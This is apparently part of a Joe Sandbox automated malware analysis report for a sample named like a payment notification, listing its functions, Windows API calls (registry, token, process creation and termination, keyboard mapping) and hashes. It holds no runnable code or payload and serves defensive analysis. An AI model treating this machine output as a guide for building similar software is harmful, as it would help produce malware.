RegCloseKey.ADVAPI32(?,?,00000000), ref: 009BBDF3
RegCloseKey.ADVAPI32(?), ref: 009BBDFF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: 3379effd5248581f47d99dd49368427b4ac5341327b1acd8110c4f1afeee543c
Instruction ID: 9590b2cadbfbdd2e99ef9e1fd7b25ef42377805d873ba06b36d9a23c5ddfa0d1
Opcode Fuzzy Hash: 3379effd5248581f47d99dd49368427b4ac5341327b1acd8110c4f1afeee543c
Instruction Fuzzy Hash: 49818B70208241AFC714DF24C991E6ABBE9FF84318F14895CF4994B2A2CB71ED45CB92

Function 0098F7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 0098F7B9
SysAllocString.OLEAUT32(00000001), ref: 0098F860
VariantCopy.OLEAUT32(0098FA64,00000000), ref: 0098F889
VariantClear.OLEAUT32(0098FA64), ref: 0098F8AD
VariantCopy.OLEAUT32(0098FA64,00000000), ref: 0098F8B1
VariantClear.OLEAUT32(?), ref: 0098F8BB

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 317363be30e9c1fc2a9baf32bed33b032aee6b347a4c1312a94182f7ca542974
Instruction ID: e87bcebebdf28d606e245d1726c39a4a14d3f02d9457c4ff7e696d70ee29744d
Opcode Fuzzy Hash: 317363be30e9c1fc2a9baf32bed33b032aee6b347a4c1312a94182f7ca542974
Instruction Fuzzy Hash: EF51A835910310BBCF14BB65D8A5F29B3A9EF85710F24A466F906DF391DB748C40CBA6

Function 009A910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 00937620: _wcslen.LIBCMT ref: 00937625

Part of subcall function 00936B57: _wcslen.LIBCMT ref: 00936B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 009A94E5
_wcslen.LIBCMT ref: 009A9506
_wcslen.LIBCMT ref: 009A952D
GetSaveFileNameW.COMDLG32(00000058), ref: 009A9585

Strings

X, xrefs: 009A9412

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 1838eaa3f33c3728662a04c44a3fc2ab446b1fd289ad9f8aebf84efadd4986c6
Instruction ID: a11e3c5b3e33844e3bb9e398f606c3b554f6e72a7230dcdfe6984dc3b04da1e5
Opcode Fuzzy Hash: 1838eaa3f33c3728662a04c44a3fc2ab446b1fd289ad9f8aebf84efadd4986c6
Instruction Fuzzy Hash: 59E18C719083119FCB24DF24C891B6AB7E4BFC5314F14896DF8999B2A2DB31ED05CB92

Function 0094920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

BeginPaint.USER32(?,?,?), ref: 00949241
GetWindowRect.USER32(?,?), ref: 009492A5
ScreenToClient.USER32(?,?), ref: 009492C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 009492D3
EndPaint.USER32(?,?,?,?,?), ref: 00949321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009871EA

Part of subcall function 00949339: BeginPath.GDI32(00000000), ref: 00949357

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: 2c4c89830bd83b7b56e4173300f6f6fd3af9396e94150e1126499dd78e18e249
Instruction ID: 29ef7c559c2b5632b7a43eeabbd59f7aa7ed4c37c321ba34330917687173e4c4
Opcode Fuzzy Hash: 2c4c89830bd83b7b56e4173300f6f6fd3af9396e94150e1126499dd78e18e249
Instruction Fuzzy Hash: A941BD70508205AFD720DF64CCC8FBB7BA8EF8A364F140629F9A4872E1C7709846DB61

Function 009A07EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 009A080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 009A0847
EnterCriticalSection.KERNEL32(?), ref: 009A0863
LeaveCriticalSection.KERNEL32(?), ref: 009A08DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 009A08F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 009A0921

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: ca33ff4320db5fb07bfbdd478e95e57ec1a238cdeed0c7e208b6f10306ca9e7c
Instruction ID: 3184e4e7ba274adac87ba2c99f7a51230f350ae7168946c8672e141ddcbd1a17
Opcode Fuzzy Hash: ca33ff4320db5fb07bfbdd478e95e57ec1a238cdeed0c7e208b6f10306ca9e7c
Instruction Fuzzy Hash: AA418871900205EFDF04AF54DC85AAABBB8FF85300F1440A9ED049A296DB31DE65DBA4

Function 009C81DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0098F3AB,00000000,?,?,00000000,?,0098682C,00000004,00000000,00000000), ref: 009C824C
EnableWindow.USER32(00000000,00000000), ref: 009C8272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 009C82D1
ShowWindow.USER32(00000000,00000004), ref: 009C82E5
EnableWindow.USER32(00000000,00000001), ref: 009C830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 009C832F

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 447fe89c3a1e7e3051d0e5131486435cadd252503fee1fb77d0fb18d9cd33385
Instruction ID: 4646e4180199097d1c25f5e2206450adfb3c89c02bf589fe31e3fc5f3bfd6651
Opcode Fuzzy Hash: 447fe89c3a1e7e3051d0e5131486435cadd252503fee1fb77d0fb18d9cd33385
Instruction Fuzzy Hash: 3841C330A01644EFDB21CF54C899FE67BE4FB4A754F1852ADE5184F2B2CB31A842CB52

Function 00994C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00994C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00994CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00994CEA
_wcslen.LIBCMT ref: 00994D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00994D10
_wcsstr.LIBVCRUNTIME ref: 00994D1A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 8698c526f404b3423e49d999f13c308af3323c7a681eabf5264e9af5bef097c7
Instruction ID: 0a282f94b51ed6f35a46207f21c635bcc029b6e3d8a16151d5e2cca692269a9d
Opcode Fuzzy Hash: 8698c526f404b3423e49d999f13c308af3323c7a681eabf5264e9af5bef097c7
Instruction Fuzzy Hash: 2A212676604201BBEF169B39AD09E7B7F9CDF89750F108029F809CA191EA61DC4297A0

Function 009A581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 00933AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00933A97,?,?,00932E7F,?,?,?,00000000), ref: 00933AC2

_wcslen.LIBCMT ref: 009A587B
CoInitialize.OLE32(00000000), ref: 009A5995
CoCreateInstance.OLE32(009CFCF8,00000000,00000001,009CFB68,?), ref: 009A59AE
CoUninitialize.OLE32 ref: 009A59CC

Strings

.lnk, xrefs: 009A5876, 009A58C1, 009A5985

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: 5b631c9170a2d815bb9a26d7464c7e3e2fe5073aa48a925002d70d9d365dc1eb
Instruction ID: c76356af470f4763ddd4ce18cc4726e580d5a09e97157d0baffb49fab893eac3
Opcode Fuzzy Hash: 5b631c9170a2d815bb9a26d7464c7e3e2fe5073aa48a925002d70d9d365dc1eb
Instruction Fuzzy Hash: 28D142B56086019FC714DF25C480A2ABBE5FFCA714F16885DF88A9B361DB31EC45CB92

Function 0099175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00990FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00990FCA
Part of subcall function 00990FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00990FD6
Part of subcall function 00990FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00990FE5
Part of subcall function 00990FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00990FEC
Part of subcall function 00990FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00991002

GetLengthSid.ADVAPI32(?,00000000,00991335), ref: 009917AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 009917BA
HeapAlloc.KERNEL32(00000000), ref: 009917C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 009917DA
GetProcessHeap.KERNEL32(00000000,00000000,00991335), ref: 009917EE
HeapFree.KERNEL32(00000000), ref: 009917F5

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: ab6ea73a944c4672f372f342c6b693de79cef1c284aa90f101b9781f0e9f941b
Instruction ID: a1164737000d055663de573babc3de214e1c121929c7452e3f0124459b649564
Opcode Fuzzy Hash: ab6ea73a944c4672f372f342c6b693de79cef1c284aa90f101b9781f0e9f941b
Instruction Fuzzy Hash: 7E11A972A18206FFDF109FA9CC59FAE7BA9FB41355F144018F486A7220C736A940DB60

Function 009914CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 009914FF
OpenProcessToken.ADVAPI32(00000000), ref: 00991506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00991515
CloseHandle.KERNEL32(00000004), ref: 00991520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0099154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00991563

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: c44ab9c956f1a0db677bb9fbaa31a29400fed278841c1d5e028d63d5cc385217
Instruction ID: ce0aaba77c16580b7c01eea0093e1dbcb67d414f6ce3ecc3110266b59425f70f
Opcode Fuzzy Hash: c44ab9c956f1a0db677bb9fbaa31a29400fed278841c1d5e028d63d5cc385217
Instruction Fuzzy Hash: 8A1117B260424AABDF11CF98ED49FDA7BA9FB48744F054015FA09A2060C3758E61AB61

Function 00953382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00953379,00952FE5), ref: 00953390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0095339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 009533B7
SetLastError.KERNEL32(00000000,?,00953379,00952FE5), ref: 00953409

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 8456dcf07347bdfa57f3d30f8b3a52fe640d166ac2f29643cd478cc42ef6897f
Instruction ID: ad963482c85753c0a08aaffa2fca13d136e09ae679ac915a350d32ce09ff6ba3
Opcode Fuzzy Hash: 8456dcf07347bdfa57f3d30f8b3a52fe640d166ac2f29643cd478cc42ef6897f
Instruction Fuzzy Hash: 5301683261D711BEEA15A7767D82A762B48DB453FB320C22DFC10851F0EF210D0EA348

Function 00962D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00965686,00973CD6,?,00000000,?,00965B6A,?,?,?,?,?,0095E6D1,?,009F8A48), ref: 00962D78
_free.LIBCMT ref: 00962DAB
_free.LIBCMT ref: 00962DD3
SetLastError.KERNEL32(00000000,?,?,?,?,0095E6D1,?,009F8A48,00000010,00934F4A,?,?,00000000,00973CD6), ref: 00962DE0
SetLastError.KERNEL32(00000000,?,?,?,?,0095E6D1,?,009F8A48,00000010,00934F4A,?,?,00000000,00973CD6), ref: 00962DEC
_abort.LIBCMT ref: 00962DF2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 31ba6615e50a1676036dd6ae24299cd9c982c85232a7970f07323af5f3a6c757
Instruction ID: 127c17699996ddde4feb3502af434fb73078867c5a5c1afc56ef464783608aeb
Opcode Fuzzy Hash: 31ba6615e50a1676036dd6ae24299cd9c982c85232a7970f07323af5f3a6c757
Instruction Fuzzy Hash: 81F0FC71A0CE0137C2123734BD36F6F2A5DAFC27E1F254419F828D61D2EF3488015260

Function 009C8A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00949639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00949693
Part of subcall function 00949639: SelectObject.GDI32(?,00000000), ref: 009496A2
Part of subcall function 00949639: BeginPath.GDI32(?), ref: 009496B9
Part of subcall function 00949639: SelectObject.GDI32(?,00000000), ref: 009496E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 009C8A4E
LineTo.GDI32(?,00000003,00000000), ref: 009C8A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 009C8A70
LineTo.GDI32(?,00000000,00000003), ref: 009C8A80
EndPath.GDI32(?), ref: 009C8A90
StrokePath.GDI32(?), ref: 009C8AA0

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2cc9f312216c873235d007385ffc0ffb9a92bbdad86612619e14724616dc7c08
Instruction ID: 531578cb07e875c5c543aa0c97a5b987dfde58ecdf7c5d80fd932889b83a74b0
Opcode Fuzzy Hash: 2cc9f312216c873235d007385ffc0ffb9a92bbdad86612619e14724616dc7c08
Instruction Fuzzy Hash: 9511F77680410CFFDF129F90DC88EAA7F6CEB08390F048016FA599A1A1C7719D55EBA0

Function 009951FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00995218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00995229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00995230
ReleaseDC.USER32(00000000,00000000), ref: 00995238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0099524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00995261

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: edd5c240cf15fec1c726144091699026877b9d54f705c92f62e2ead419138f8c
Instruction ID: 8db98df5bfec515ef3bf04a02b216c97286d2151573d1240d94be9a72ce0a2f4
Opcode Fuzzy Hash: edd5c240cf15fec1c726144091699026877b9d54f705c92f62e2ead419138f8c
Instruction Fuzzy Hash: CE0144B5E05719BBEF109BA59D49E5EBF78EB48751F044065FA08A7281D6709800DB60

Function 00931BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00931BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 00931BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00931C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00931C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00931C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00931C22

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 5d5a0a6d79493b6059f95ad210e81935bab47fa61752b9952f559a4f3ac7dd03
Instruction ID: 3b7333f3fb6d2a9b2b6fea454a163468815ab333baf4a7752e5e2f96e8b7c5a4
Opcode Fuzzy Hash: 5d5a0a6d79493b6059f95ad210e81935bab47fa61752b9952f559a4f3ac7dd03
Instruction Fuzzy Hash: 470167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5

Function 0099EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0099EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0099EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0099EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0099EB75

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: ee0014c0b8b694b94a6c3ab66e3bb3d423b4061a600d0096cc1e89cb06ca7176
Instruction ID: b10239a11fdad9364ad2d38b98474f7a64014389c8c048efad73112a99944ee5
Opcode Fuzzy Hash: ee0014c0b8b694b94a6c3ab66e3bb3d423b4061a600d0096cc1e89cb06ca7176
